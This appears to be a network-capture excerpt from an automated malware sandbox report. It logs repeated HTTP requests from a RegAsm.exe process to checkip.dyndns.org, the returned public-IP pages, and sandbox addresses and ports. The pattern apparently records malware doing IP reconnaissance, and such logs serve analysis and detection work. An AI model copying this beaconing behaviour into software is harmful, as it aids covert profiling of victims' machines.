                                                                            Jan 9, 2025 11:38:17.412442923 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:17 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.449751132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:19.218113899 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:19.909158945 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:19 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.449753132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:21.499069929 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:22.199682951 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:22 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.449755132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:24.572582006 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:25.268188000 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:25 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.449757132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:27.174815893 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:27.846672058 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:27 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.449759132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:29.501219988 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:30.174276114 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:30 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.449761132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:31.842878103 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:32.525414944 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:32 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.449763132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:34.233618021 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:34.915745974 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:34 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.449765132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:36.585436106 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:37.257903099 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:37 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.449767132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:38.933408976 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:39.619569063 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.449769132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:41.301155090 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:41.973223925 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:41 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.449771132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:43.644927979 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:44.317265034 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:44 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.449773132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:45.965107918 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:46.658504009 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:46 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.449775132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:48.443855047 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:49.122189999 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:49 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.449778132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:50.894754887 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:51.594748020 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:51 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.449780132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:53.263319969 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:53.958992958 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:53 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.449788132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:55.607585907 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:56.307316065 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:56 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.449805132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:38:57.982824087 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:38:58.673959970 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:38:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            24192.168.2.449822132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:00.343715906 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:01.015866041 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            25192.168.2.449839132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:02.656717062 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:39:03.343053102 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:03 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            26192.168.2.449856132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:04.985112906 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:39:05.658595085 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:39:05 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            27192.168.2.449873132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:39:07.290003061 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
